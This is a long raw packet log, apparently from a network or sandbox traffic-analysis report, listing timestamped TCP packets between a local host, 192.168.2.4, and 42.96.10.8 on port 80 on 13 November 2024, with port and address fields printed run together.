                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017235041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017251015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017266989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017275095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017293930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017308950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017324924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017343044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017347097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017347097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017359018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017452955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017452955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.048891068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.048916101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.048933983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049176931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049192905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049207926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049222946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049222946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.049251080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057322025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057337046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057427883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057444096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057455063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057462931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057481050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057521105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057521105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057881117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057895899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057910919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057924986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057961941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.057961941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058561087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058588028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058603048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058660030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058676004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058691978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058706999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058706999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058749914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058759928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.058764935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.059298038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.059322119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.059339046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.062994003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.077984095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.077997923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.078008890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.079355955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081048012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081084013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081101894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081119061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081135988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081162930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081171036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081171036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081171036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081177950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081197023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081239939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081255913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081273079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081298113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081348896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081348896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081367016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081383944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081401110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081415892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081433058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081451893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081460953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081470966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081476927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081492901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081507921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081523895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081540108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081573963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081573963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081573963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081604958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081620932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081636906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081651926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081667900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081684113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081706047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081706047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081706047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081727028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081743956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081839085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081854105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081870079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081885099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081901073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081917048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081933022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081940889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081940889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081940889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081949949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081979036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.081993103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082009077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082020998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082020998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082020998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082024097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082056999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082073927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082088947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082103968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082118988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082118988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082119942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082137108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082138062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082155943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082174063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082190037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082256079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082324028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082340956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082355976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082371950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082386971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082403898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082417965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082425117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082425117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082425117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082433939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082448959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082465887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082470894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082483053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082493067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082685947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082700968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082715034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082726955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082726955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082726955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082732916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082751036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082766056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082782030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082797050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082812071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082828045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082844019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082850933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082850933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082850933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082859993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082878113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082912922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082912922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.082912922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083025932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083039999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083055019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083070040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083086014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083110094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083125114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083132029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083142042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083151102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083153009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083167076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083183050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083184958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083205938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083209038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083224058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083240032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083256006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083261967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083276033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083290100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083321095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083344936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083348989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083359957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083374977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083394051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083409071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083410978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083429098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083432913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083446026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083466053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083482027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083491087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083491087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083498001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083517075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083532095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083549023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083564997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083574057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083574057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083590031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083594084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083611012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083626986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083633900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083643913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083667040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083683014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083707094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.083740950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091212988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091384888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091401100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091427088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091443062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091459990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091468096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091468096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091475964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091487885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091495037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091510057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091536045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091552019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091567993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091592073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091592073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091592073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091598034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091617107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091630936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091639996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091655970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091670036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091691971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091696024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091696024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091696024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091708899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091725111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091739893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091757059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091773033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091789961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091797113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091803074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091871023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091882944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091898918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091914892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091932058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091955900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091955900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091955900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.091985941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092003107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092019081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092035055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092051983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092075109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092075109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092092037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092109919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092124939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092149019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092149019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092159986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092204094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092219114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092245102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092259884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092317104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092333078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092360020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092375040 CET804973342.96.10.8192.168.2.4
